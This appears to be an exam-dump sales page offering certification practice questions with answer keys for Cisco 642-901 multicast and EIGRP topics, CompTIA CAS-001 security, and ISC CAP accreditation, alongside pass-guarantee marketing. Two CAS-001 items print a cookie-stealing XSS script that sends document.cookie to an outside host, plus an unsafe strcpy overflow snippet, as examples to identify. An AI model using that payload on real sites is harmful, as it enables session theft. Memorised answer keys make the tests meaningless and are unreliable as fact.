Day: August 13, 2016
Flydumps Cisco 642-901 practice tests hold the key importance and provide a considerable gain for your knowledge base. You can rely on our products with unwavering confidence; Get the profound knowledge and become a pro with Flydumps assistance.
QUESTION 181
Which differences are those between IGMP Snooping and CGMP? (Choose two)
A. IGMP snooping is Cisco proprietary
B. CGMP learns subscribing MAC addresses from the router
C. CGMP learns subscribing MAC addresses by passive listening
D. IGMP snooping requires layer 3 processing
Correct Answer: BD Section: (none) Explanation
QUESTION 182
Based on the partial configuration provided in the exhibit, what additional configuration is required to allow the router to properly participate in a PIM sparse-dense mode scenario?
A. IGMP needs to be enabled on the router.
B. The RP configuration needs to be added for the router to participate in sparse mode network areas.
C. The RP configuration needs to be added for the router to participate in dense mode network areas.
D. The PIM dense-mode state, refresh interval needs to be configured.
Correct Answer: B Section: (none) Explanation
QUESTION 183
Which command sequence is a requirement for configuring the IP address of the rendezvous point (RP) located at IP address 10.10.10.1?
A. Switch(config)# ip pim rp-address 10.10.10.1
B. Switch(config)# ip igmp join-group 10.10.10.1
C. Switch(config)# ip pim accept-rp 10.10.10.1 1
D. Switch(config)# ip pim rp-candidate gigabitethernet0/2
Correct Answer: A Section: (none) Explanation
QUESTION 184
Examine the exhibit carefully. All multilayer switches are running PIM dense mode. Recipient A and Recipient B are forwarding IGMPv2 join messages to their respective multilayer switches. Which option is correct?
A. The Multicast Server is the root of the multicast tree. Switches 4 and 5 will participate in the multicast tree once pruning has taken place.
B. The Multicast Server is the root of the multicast tree. Switches 1,3,4, and 5 will participate in the multicast tree once pruning has taken place.
C. Switch 1 is the root of the multicast tree. Switches 1,3,4, and 5 will participate in the multicast tree once pruning has taken place.
D. Switch 3 is the root of the multicast tree. Switches 1,3,4, and 5 will participate in the multicast tree once pruning has taken place.
Correct Answer: B Section: (none) Explanation
QUESTION 185
Study the exhibit below. IP multicast for group address 224.1.1.1 has been enabled on all routers in the network. Hosts on Network A receive the multicast traffic. However, hosts on Network B do not. Refer to outputs presented, what will cause this problem?
A. The multicast packets are sourced from a server with an unspecified IP address.
B. Router P4S2 does not have an RP configured on the multicast network.
C. Because of RPF failure, Router P4S2 does not forward multicast packets to Network B.
D. Router P4S2 does not regard the upstream router P4S1 as a PIM neighbor.
Correct Answer: C Section: (none)
Explanation
QUESTION 186
According to the network of Layer 3 switches in the exhibit, the RPI Multicast Server only multicasts to hosts connected to multilayer switches 5 and 6. The CMU Multicast Server multicasts to hosts on multi-layer switches 1-6. Refer to the number of configuration steps involved, which way most efficiently configures the network when meeting the requirements for multicast data flow?
A. Configure each switch with PIM sparse mode.
B. Configure each switch with PIM dense mode.
C. Configure each switch with PIM sparse mode and a separate instance of PIM dense mode. Leave each multicast server as the root of its own multicast tree.
D. Configure each switch with PIM sparse-dense mode. Configure switch 3 as a rendezvous point for the RPI multicast stream.
Correct Answer: D Section: (none) Explanation QUESTION 187
You are a network technician at P4S .Study the exhibit carefully. All multilayer switches are running PIM sparse mode. Host P4SB and Host P4SF are sending IGMPv2 join messages to their respective multilayer switches. Which description is correct?
A. Switches 2 and 6 will participate in the multicast tree once pruning has taken place.
B. The multicast server is the rendezvous point of the multicast tree.
C. Switches 1, 2, 3, and 6 will participate in the multicast tree once pruning has taken place.
D. Switches 1, 2, 3, and 6 will participate in the multicast tree.
Correct Answer: D Section: (none) Explanation
QUESTION 188
You work as a network engineer at P4S, and you are tasked to configure a large Frame Relay network. The desired topology is full mesh. Assume that n represents the
number of router
endpoints in the topology. What formula should be used to determine how many PVCs to configure?
A. n*n
B. 2*n
C. 3*n
D. n*(n-1)/2
Correct Answer: D Section: (none) Explanation
QUESTION 189
Study the exhibit carefully. Which two conclusions can be derived from the debug ip igmp output? (Choose two.)
A. The IP multicast groups are 224.0.0.1, 224.0.1.40, and 239.255.0.1.
B. IP PIM RP mapping is static.
C. Router P4S-RA received an IGMP report version 1 from host 192.168.9.1.
D. The router sent an IGMP version 2 query out interface Ethernet1 at multicast address 224.0.0.1.
Correct Answer: CD Section: (none) Explanation
QUESTION 190
From the show ip eigrp topology command output, which code is the indication of a convergence problem for the associated network?
A. Active
B. Update
C. Query
D. SIA
Correct Answer: D Section: (none) Explanation
QUESTION 191
Protocol Independent Multicast (PIM) has two modes: Sparse Mode and Dense Mode. Here, we focus on the Dense Mode. Which statement correctly describes Protocol Independent Multicast Dense Mode (PIM DM) multicast routing?
A. If a port is pruned, the administrator must re-enable the port to support multicast traffic.
B. PIM DM supports shared distribution trees.
C. The (S,G) state exists in every router, regardless of the presence of an RPF interface.
D. Flooding of traffic only occurs in the beginning stages of routing. Afterwards, all necessary ports are pruned and multicast traffic is not sent across those interfaces.
Correct Answer: C Section: (none) Explanation
QUESTION 192
Which three descriptions are correct regarding the Internet Group Management Protocol (IGMP)? (Choose three.)
A. IGMP is a multicast routing protocol that makes packet-forwarding decisions independent of other routing protocols such as EIGRP.
B. IGMP is used to register individual hosts with a multicast group.
C. IGMP version 3 enables a multicast receiving host to specify to the router which sources it should forward traffic from.
D. IGMP messages are IP datagrams with a protocol value of 2, destination address of 224.0.0.2, and a TTL value of 1.
Correct Answer: BCD Section: (none) Explanation
QUESTION 193
Which two multicast IP addresses can be represented by the multicast MAC address 0100.5e0A.0A07? (Choose two.)
A. 229.138.10.7
B. 228.10.138.7
C. 228.10.10.8
D. 228.10.10.7
Correct Answer: AD Section: (none) Explanation
QUESTION 194
A P4S network administrator assigns a multicast address of 239.255.8.5 to an application running on a
device with an Ethernet MAC address of 01.b2.7d.05.f1.80.
Which Layer 2 multicast
address will be used by this device?
A. 01.00.5e.7F.08.05
B. 01.00.5e.05.f1.80
C. 01.b2.7d.05.f1.80
D. 01.b2.7d.0a.08.05
Correct Answer: A Section: (none) Explanation QUESTION 195
The IP multicast global configuration command ip pim send-rp-announce loopback0 scope 31 group-list 5 issued on multicast router RTA. What are the two results? (Choose two)
A. RTA will originate RP announcements with TTL set to 31.
B. RTA will drop all RP announcements it receives if the TTL field is greater than 31.
C. RTA will forward RP announcements provided they are within the scope of 31.
D. RTA will originate RP announcements for multicast groups that match access-list 5.
Correct Answer: AD Section: (none) Explanation
QUESTION 196
Which three statements correctly describe IP multicast configuration? (Choose three.)
A. PIM sparse mode interfaces are always added to the multicast routing table in a router.
B. PIM sparse mode and PIM sparse-dense mode require an RP on the network.
C. PIM dense mode interfaces are always added to the multicast routing table in a router.
D. PIM sparse-dense mode acts as PIM dense mode if an RP is not known.
Correct Answer: BCD Section: (none) Explanation
QUESTION 197
Internet Protocol (IP) multicast is a bandwidth-conserving technology that reduces traffic by simultaneously delivering a single stream of information to thousands of corporate recipients and homes .Which three IP multicast related statements are true? (Choose three.)
A. Multicast addresses 239.0.0.0 through 239.255.255.255 are called limited scope addresses. They are constrained to a local group or organization.
B. The multicast address 224.0.0.1 is a globally scoped address that has been reserved for the Network Time Protocol (NTP) by the IANA.
C. Multicast addresses 224.0.1.0 through 238.255.255.255 are called globally scoped addresses. They are used to multicast data between organizations and across the Internet.
D. Multicast addresses 224.0.0.0 through 224.0.0.255 are used for network protocols on local LAN segments. Because they are always transmitted with a Time to Live (TTL) of 1, they are never forwarded by a router.
Correct Answer: ACD Section: (none) Explanation
QUESTION 198
When a network client wants to join a multicast group, which type of IGMP message is transmitted?
A. host membership status
B. host membership report
C. host membership notification
D. host membership query
Correct Answer: B Section: (none) Explanation
QUESTION 199
What is the MAC address that comes from the multicast address 239.255.0.1?
A. 01-01-ef-ff-00-01
B. 10-00-ef-ff-00-01
C. 01-00-5e-7f-00-01
D. 00-00-00-7f-00-01
Correct Answer: C Section: (none) Explanation
QUESTION 200
Examine the following statements, then answer this question. When the passive-interface command is used on a router, which two routing protocols will continue to receive routing updates on an interface that is configured as passive? (Choose two.)
A. EIGRP
B. RIP
C. RIPv2
D. OSPF
Correct Answer: BC Section: (none) Explanation
QUESTION 201
The P4Spany has implemented EIGRP in its network.
Identify three characteristics of EIGRP feasible successors? (Choose three.)
A. If the successor becomes unavailable, then the feasible successor can be used immediately without recalculating for a lost route.
B. A feasible successor is selected by comparing the advertised distance of a non-successor route to the feasible distance of the best route.
C. If the advertised distance of the non-successor route is less than the feasible distance of best route, then that route is identified as a feasible successor.
D. The feasible successor can be found in the routing table.
Correct Answer: ABC Section: (none) Explanation
QUESTION 202
IP Multicast is a method of forwarding IP datagrams to a group of interested receivers. Examine the exhibit
carefully. IP multicast configuration changes have been made on several routers.
However, the IP multicast table shown in the exhibit still does not reflect the changes. What should be
done in order to display the new routing table information?
A. Issue the clear ip route * privileged EXEC command.
B. Issue the no ip mroute-cache privileged EXEC command.
C. Issue the clear ip mroute privileged EXEC command.
D. Issue the clear ip igmp group privileged EXEC command.
Correct Answer: C Section: (none) Explanation
QUESTION 203
Examine the exhibit carefully. Each router has Protocol Independent Multicast (PIM) enabled interfaces.
Based on the configuration presented on routers P4S1 and P4S2, which router
will take on the function of rendezvous point (RP) for the multicast network?
A. both routers P4S 1 and P4S 2
B. router P4S2
C. router P4S1
D. none of the routers since they are not configured with static RP
Correct Answer: B Section: (none) Explanation
QUESTION 204
Look at the exhibit below. Which two facts are important in interpreting the output of the show ip pim interface command? (Choose two.)
A. Multiaccess, multicast segments do not elect a DR.
B. Point-to-Point links do not display DR information.
C. Multiaccess segments elect a DR based on lowest IP address.
D. Multiaccess segments elect a DR based on highest IP address.
Correct Answer: BD Section: (none) Explanation
QUESTION 205
Which two statements best describe multicast protocol? (Choose two.)
A. Sparse mode uses reverse path forwarding (RPF) to prune off redundant flows.
B. Sparse mode multicast uses a pull model to send multicast traffic to where it is requested.
C. Dense mode multicast uses a push model to flood traffic throughout the network and then prunes the unwanted traffic.
D. The primary use of sparse mode multicast is for test labs and router performance testing.
Correct Answer: BC Section: (none) Explanation
QUESTION 206
If you want to allow a switch to decide which ports to forward IP multicast messages , what methods may be effective? (Choose three)
A. IGMP
B. CGMP
C. IGMP snooping
D. static assignment
Correct Answer: BCD Section: (none) Explanation QUESTION 207
Look at the following exhibit. Choose two correct statements regarding the PIM sparse mode network! (Choose two)
A. The multicast source is connected to the serial 1/4 interface.
B. The multicast source is directly connected to this router.
C. The multicast receiver is directly connected to this router.
D. The RP for this network is this router.
Correct Answer: AD Section: (none) Explanation
QUESTION 208
Study the exhibit carefully. According to the configuration in the exhibit ,which statement is correct ?
A. The rendezvous point is IP address 172.16.4.16.
B. IGMP version 2 is being used.
C. If a rendezvous point is configured, the interface cannot operate in dense mode.
D. A rendezvous point must be configured in order for the interface to operate in sparse mode.
Correct Answer: D Section: (none) Explanation
QUESTION 209
P4S uses IGMP version 2 in their IP multicast network. How is the designated querier elected in IGMPv2?
A. The first router to appear on a subnet is designated.
B. The host with the lowest MAC address on a segment is designated.
C. The router with the lowest IP address on a subnet is designated.
D. The host that responds first to the election query is designated.
Correct Answer: C Section: (none) Explanation
QUESTION 210
Study the exhibit below carefully. Switch P4S-Switch is receiving IGMP frames only on interface FastEthernet 0/3.Refer to the IGMP snooping, out of which port or ports will switch P4S-Switch forward multicast traffic?
A. all ports
B. FastEthernet 0/1, 0/2, 0/3, 0/4
C. FastEthernet 0/3
D. FastEthernet 0/1, 0/2, 0/4, 0/5, 0/6, 0/7, 0/8
Correct Answer: C Section: (none) Explanation
QUESTION 211
Which two statements correctly describe the rendezvous point (RP) in a multicast network? (Choose two.)
A. An RP is required only in networks running Protocol Independent Multicast sparse-dense mode (PIM-SDM).
B. To form the multicast distribution tree, the multicast sources register with and the receivers join the RP.
C. An RP is required only in networks running Protocol Independent Multicast dense mode (PIM DM).
D. An RP is required only in networks running Protocol Independent Multicast sparse mode (PIM SM).
Correct Answer: BD Section: (none) Explanation
QUESTION 212
In order to display the two values used in the calculation of the EIGRP metric, which show command will be used?
A. show ip eigrp neighbor
B. show protocol
C. show interface
D. show ip eigrp interface
Correct Answer: D Section: (none) Explanation
QUESTION 213
You work as a network engineer at P4S.Refer to the exhibit. Given the output of a debug ip mrouting command, which two statements are correct? (Choose two.)
A. This router P4S received an IGMP host report from a group member or a PIM join message.
B. Multicast route to 224.69.15.0/24 was added to the mroute table and created by a source directly connected to the router P4S.
C. Multicast route to 10.16.0.0/16 was added to the mroute table and created by a source directly connected to the router P4S.
D. The reverse path forwarding (RPF) for the route 224.2.0.1 failed to find the interface on which the multicast packet was received.
Correct Answer: AC Section: (none) Explanation
QUESTION 214
For the following options, which three IP multicast group concepts are correct? (Choose three.)
A. A router must be a member of a multicast group to receive multicast data.
B. A router does not have to be a member of a multicast group to receive multicast data.
C. If a packet is sent to a multicast group address, the multicast frame contains the source multicast address.
D. A router does not have to be a member of a multicast group to send to the group.
E. If a packet is sent to a multicast group address, all members of the multicast group will receive it.
Correct Answer: ADE Section: (none) Explanation
QUESTION 215
Which three IP multicast address related descriptions are correct? (Choose three.)
A. Multicast addresses 224.0.0.0 through 224.0.0.255 are always forwarded because they are transmitted with Time to Live (TTL) greater than 1.
B. Multicast addresses 224.0.0.13 and 224.0.0.22 are reserved link-local addresses used by PIMv2 and IGMPv3.
C. Multicast address 224.0.1.1 has been reserved for the Network Time Protocol (NTP) by the IANA.
D. The administratively scoped multicast addresses 239.0.0.0 through 239.255.255.255 are similar in purpose to RFC 1918 private unicast addresses.
Correct Answer: BCD Section: (none) Explanation
With the products Cisco 642-901 for training and preparation of testing you would not only significantly reduce your fees, but pass your Cisco 642-901 exam. We obtain our products from Authorities experts from test center.We give you the best path to successful completion of your exam to the real and original exam questions and answers for Cisco 642-901.
Cisco 642-901 Study Guide, High Quality Cisco 642-901 Exam Q&As Covers All Key Points
Flydumps CompTIA CAS-001 material details are researched and created by the most professional certified authors who are regularly using current exams experience to create precise and logical dumps. You can get questions and answers from many other websites or books, but logic is the main key of success. And Flydumps will give you this key of success.
QUESTION 1
Which of the following attacks does Unicast Reverse Path Forwarding prevent?
A. Man in the Middle
B. ARP poisoning
C. Broadcast storm
D. IP Spoofing
Correct Answer: D QUESTION 2
Which of the following authentication types is used primarily to authenticate users through the use of tickets?
A. LDAP
B. RADIUS
C. TACACS+
D. Kerberos Correct Answer: D QUESTION 3
A security consultant is evaluating forms which will be used on a company website. Which of the following techniques or terms is MOST effective at preventing malicious individuals from successfully exploiting programming flaws in the website?
A. Anti-spam software
B. Application sandboxing
C. Data loss prevention
D. Input validation Correct Answer: D QUESTION 4
A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. The security administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found. Which of the following should the security administrator implement?
A. Entropy should be enabled on all SSLv2 transactions.
B. AES256-CBC should be implemented for all encrypted data.
C. PFS should be implemented on all VPN tunnels.
D. PFS should be implemented on all SSH connections.
Correct Answer: C QUESTION 5
A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred?
A. A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token.
B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk.
C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.
D. A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access. Correct Answer: C QUESTION 6
Company XYZ provides residential television cable service across a large region. The company’s board of directors is in the process of approving a deal with the following three companies:
A National landline telephone provider
A Regional wireless telephone provider
An international Internet service provider
The board of directors at Company XYZ wants to keep the companies and billing separated.
While the Chief Information Officer (CIO) at Company XYZ is concerned about the confidentiality of Company XYZ’s customer data and wants to share only minimal information about its customers for the purpose of accounting, billing, and customer authentication.
The proposed solution must use open standards and must make it simple and seamless for Company XYZ’s customers to receive all four services.
Which of the following solutions is BEST suited for this scenario?
A. All four companies must implement a TACACS+ web based single sign-on solution with associated captive portal technology.
B. Company XYZ must implement VPN and strict access control to allow the other three companies to access the internal LDAP.
C. Company XYZ needs to install the SP, while the partner companies need to install the WAYF portion of a Federated identity solution.
D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution. Correct Answer: D QUESTION 7
The security administrator at a bank is receiving numerous reports that customers are unable to login to the bank website. Upon further investigation, the security administrator discovers that the name associated with the bank website points to an unauthorized IP address.
Which of the following solutions will MOST likely mitigate this type of attack?
A. Security awareness and user training
B. Recursive DNS from the root servers
C. Configuring and deploying TSIG
D. Firewalls and IDS technologies
Correct Answer: C QUESTION 8
A security administrator has finished building a Linux server which will host multiple virtual machines through hypervisor technology. Management of the Linux server, including monitoring server performance, is achieved through a third party web enabled application installed on the Linux server. The security administrator is concerned about vulnerabilities in the web application that may allow an attacker to retrieve data from the virtual machines.
Which of the following will BEST protect the data on the virtual machines from an attack?
A. The security administrator must install the third party web enabled application in a chroot environment.
B. The security administrator must install a software firewall on both the Linux server and the virtual machines.
C. The security administrator must install anti-virus software on both the Linux server and the virtual machines.
D. The security administrator must install the data exfiltration detection software on the perimeter firewall. Correct Answer: A QUESTION 9
A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of security professionals to deploy a system which will protect against such breaches in the future.
Which of the following can the government agency deploy to meet future security needs?
A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix.
B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL.
C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.
D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which uses an ACL. Correct Answer: C QUESTION 10
The internal auditor at Company ABC has completed the annual audit of the company’s financial system. The audit report indicates that the accounts receivable department has not followed proper record disposal procedures during a COOP/BCP tabletop exercise involving manual processing of financial transactions.
Which of the following should be the Information Security Officer’s (ISO’s) recommendation? (Select TWO).
A. Wait for the external audit results
B. Perform another COOP exercise
C. Implement mandatory training
D. Destroy the financial transactions
E. Review company procedures
Correct Answer: CE QUESTION 11
Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC’s network. Company ABC’s Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area.
Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection?
A. SLA
B. ISA
C. NDA
D. BPA
Correct Answer: B QUESTION 12
A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions.
Which of the following should the analyst provide to the ISO to support the request? (Select TWO).
A. Emerging threat reports
B. Company attack tends
C. Request for Quote (RFQ)
D. Best practices
E. New technologies report Correct Answer: AB QUESTION 13
The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company’s guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops.
Which of the following is the HIGHEST risk to the organization?
A. Employee’s professional reputation
B. Intellectual property confidentiality loss
C. Downloaded viruses on the company laptops
D. Workstation compromise affecting availability
Correct Answer: B
QUESTION 14
A security audit has uncovered a lack of security controls with respect to employees’ network account management. Specifically, the audit reveals that employee’s network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active. Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings?
A. Review the HR termination process and ask the software developers to review the identity management code.
B. Enforce the company policy by conducting monthly account reviews of inactive accounts.
C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.
D. Update the company policy to account for delays and unforeseen situations in account deactivation.
Correct Answer: C
QUESTION 15
Which of the following is true about an unauthenticated SAMLv2 transaction?
A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.
B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access.
C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access.
D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.
Correct Answer: A
QUESTION 16
A company which manufactures ASICs for use in an IDS wants to ensure that the ASICs’ code is not prone to buffer and integer overflows. The ASIC technology is copyrighted and the confidentiality of the ASIC code design is exceptionally important. The company is required to conduct internal vulnerability testing as well as testing by a third party.
Which of the following should be implemented in the SDLC to achieve these requirements?
A. Regression testing by the manufacturer and integration testing by the third party
B. User acceptance testing by the manufacturer and black box testing by the third party
C. Defect testing by the manufacturer and user acceptance testing by the third party
D. White box unit testing by the manufacturer and black box testing by the third party
Correct Answer: D
QUESTION 17
The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers.
Which of the following should the security administrator do before applying the ACL?
A. Quickly research best practices with respect to stopping Conficker infections and implement the solution.
B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager.
C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise.
D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
Correct Answer: D
QUESTION 18
A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources.
Which of the following would MOST likely need to be implemented and configured on the company’s perimeter network to comply with the new security policy? (Select TWO).
A. VPN concentrator
B. Firewall
C. Proxy server
D. WAP
E. Layer 2 switch
Correct Answer: AB
QUESTION 19
Which of the following displays an example of a buffer overflow attack?
A. <SCRIPT> document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie </SCRIPT>
B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
C. #include char *code = “AAAABBBBCCCCDDD”; //including the character ‘\0’ size = 16 bytes void main() {char buf[8]; strcpy(buf, code);
}
D. <form action=”/cgi-bin/login” method=post> Username: <input type=text name=username> PassworD. <input type=password name=password> <input type=submit value=Login>
Correct Answer: C
QUESTION 20
Which of the following displays an example of a XSS attack?
A. <SCRIPT> document.location=’http://site.comptia/cgi-bin/script.cgi?’+document.cookie </SCRIPT>
B. Checksums-Sha1:7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
C. <form action=”/cgi-bin/login” method=post> Username: <input type=text name=username> PassworD. <input type=password name=password> <input type=submit value=Login>
D. #include char *code = “AAAABBBBCCCCDDD”; //including the character ‘\0’ size = 16 bytes void main() {char buf[8]; strcpy(buf, code); }
Correct Answer: A
QUESTION 21
Several critical servers are unresponsive after an update was installed. Other computers that have not yet received the same update are operational, but are vulnerable to certain buffer overflow attacks. The security administrator is required to ensure all systems have the latest updates while minimizing any downtime.
Which of the following is the BEST risk mitigation strategy to use to ensure a system is properly updated and operational?
A. Distributed patch management system where all systems in production are patched as updates are released.
B. Central patch management system where all systems in production are patched by automatic updates as they are released.
C. Central patch management system where all updates are tested in a lab environment after being installed on a live production system.
D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
Correct Answer: D
QUESTION 22
A business is currently in the process of upgrading its network infrastructure to accommodate a personnel growth of over fifty percent within the next six months. All preliminary planning has been completed and a risk assessment plan is being adopted to decide which security controls to put in place throughout each phase.
Which of the following risk responses is MOST likely being considered if the business is creating an SLA with a third party?
A. Accepting risk
B. Mitigating risk
C. Identifying risk
D. Transferring risk
Correct Answer: D
QUESTION 23
Which of the following must be taken into consideration for e-discovery purposes when a legal case is first presented to a company?
A. Data ownership on all files
B. Data size on physical disks
C. Data retention policies on only file servers
D. Data recovery and storage
Correct Answer: D
QUESTION 24
A company has purchased a new system, but security personnel are spending a great deal of time on system maintenance. A new third party vendor has been selected to maintain and manage the company’s system. Which of the following document types would need to be created before any work is performed?
A. IOS
B. ISA
C. SLA
D. OLA
Correct Answer: C
QUESTION 25
The security administrator of a small private firm is researching and putting together a proposal to purchase an IPS to replace an existing IDS. A specific brand and model has been selected, but the security administrator needs to gather various cost information for that product. Which of the following documents would perform a cost analysis report and include information such as payment terms?
A. RFI
B. RTO
C. RFQ
D. RFC
Correct Answer: C
Flydumps offers CompTIA CAS-001 exam,the most comprehensive training exam with full of wonderful concepts and learning skills. The training tools on the site Flydumps.com prepares you with the same questions and answers for CompTIA CAS-001 from the test center.You may have seen our products.Without hesitate to procure our products. Because it is the best choice for you and even for your career in the future. We promise you 100% pass guarantee.
CompTIA CAS-001 Actual Questions, Sale Latest Release CompTIA CAS-001 Test Engine Sale
Tired of trying again and again to pass ISC CAP exam? Flydumps provides you the latest ISC CAP exam preparation material to make you pass in the first attempt. Those who are going to take ISC CAP exam shortly must use our excellent exam preparation products to increase the probability of getting amazing results.
QUESTION 1
Which of the following professionals plays the role of a monitor and takes part in the organization’s configuration management process?
A. Senior Agency Information Security Officer
B. Authorizing Official
C. Common Control Provider
D. Chief Information Officer
Correct Answer: C
QUESTION 2
The Chief Information Officer (CIO), or Information Technology (IT) director, is a job title commonly given to the most senior executive in an enterprise. What are the responsibilities of a Chief Information Officer? Each correct answer represents a complete solution. Choose all that apply.
A. Preserving high-level communications and working group relationships in an organization
B. Facilitating the sharing of security risk-related information among authorizing officials
C. Establishing effective continuous monitoring program for the organization
D. Proposing the information technology needed by an enterprise to achieve its goals and then working within a budget to implement the plan
Correct Answer: ACD
QUESTION 3
The Information System Security Officer (ISSO) and Information System Security Engineer (ISSE) play the
role of a supporter and advisor, respectively. Which of the following statements are true about ISSO and
ISSE?
Each correct answer represents a complete solution. Choose all that apply.
A. An ISSE provides advice on the impacts of system changes.
B. An ISSE manages the security of the information system that is slated for Certification & Accreditation (C&A).
C. An ISSO manages the security of the information system that is slated for Certification & Accreditation (C&A).
D. An ISSO takes part in the development activities that are required to implement system changes.
E. An ISSE provides advice on the continuous monitoring of the information system.
Correct Answer: ACE
QUESTION 4
Which of the following professionals is responsible for starting the Certification & Accreditation (C&A) process?
A. Information system owner
B. Authorizing Official
C. Chief Risk Officer (CRO)
D. Chief Information Officer (CIO)
Correct Answer: A
QUESTION 5
Which of the following assessment methodologies defines a six-step technical security evaluation?
A. FITSAF
B. FIPS 102
C. OCTAVE
D. DITSCAP
Correct Answer: B
QUESTION 6
DIACAP applies to the acquisition, operation, and sustainment of any DoD system that collects, stores,
transmits, or processes unclassified or classified information since December 1997. What phases are
identified by DIACAP?
Each correct answer represents a complete solution. Choose all that apply.
A. Accreditation
B. Identification
C. System Definition
D. Verification
E. Validation
F. Re-Accreditation
Correct Answer: CDEF
QUESTION 7
Mark works as a Network Administrator for NetTech Inc. He wants users to access only those resources that are required for them. Which of the following access control models will he use?
A. Mandatory Access Control
B. Role-Based Access Control
C. Discretionary Access Control
D. Policy Access Control
Correct Answer: B
QUESTION 8
Which of the following refers to an information security document that is used in the United States Department of Defense (DoD) to describe and accredit networks and systems?
A. FITSAF
B. FIPS
C. TCSEC
D. SSAA
Correct Answer: D
QUESTION 9
James work as an IT systems personnel in SoftTech Inc. He performs the following tasks:
Runs regular backups and routine tests of the validity of the backup data. Performs data restoration from
the backups whenever required. Maintains the retained records in accordance with the established
information classification policy.
What is the role played by James in the organization?
A. Manager
B. Owner
C. Custodian
D. User
Correct Answer: C
QUESTION 10
FITSAF stands for Federal Information Technology Security Assessment Framework. It is a methodology for assessing the security of information systems. Which of the following FITSAF levels shows that the procedures and controls have been implemented?
A. Level 4
B. Level 1
C. Level 3
D. Level 5
E. Level 2
Correct Answer: C
QUESTION 11
Certification and Accreditation (C&A or CnA) is a process for implementing information security. Which of the following is the correct order of C&A phases in a DITSCAP assessment?
A. Definition, Validation, Verification, and Post Accreditation
B. Verification, Definition, Validation, and Post Accreditation
C. Verification, Validation, Definition, and Post Accreditation
D. Definition, Verification, Validation, and Post Accreditation
Correct Answer: D
QUESTION 12
System Authorization is the risk management process. System Authorization Plan (SAP) is a
comprehensive and uniform approach to the System Authorization Process. What are the different phases
of System Authorization Plan?
Each correct answer represents a part of the solution. Choose all that apply.
A. Post-Authorization
B. Pre-certification
C. Post-certification
D. Certification
E. Authorization
Correct Answer: ABDE
QUESTION 13
Certification and Accreditation (C&A or CnA) is a process for implementing information security. It is a systematic procedure for evaluating, describing, testing, and authorizing systems prior to or after a system is in operation. Which of the following statements are true about Certification and Accreditation? Each correct answer represents a complete solution. Choose two.
A. Accreditation is the official management decision given by a senior agency official to authorize operation of an information system.
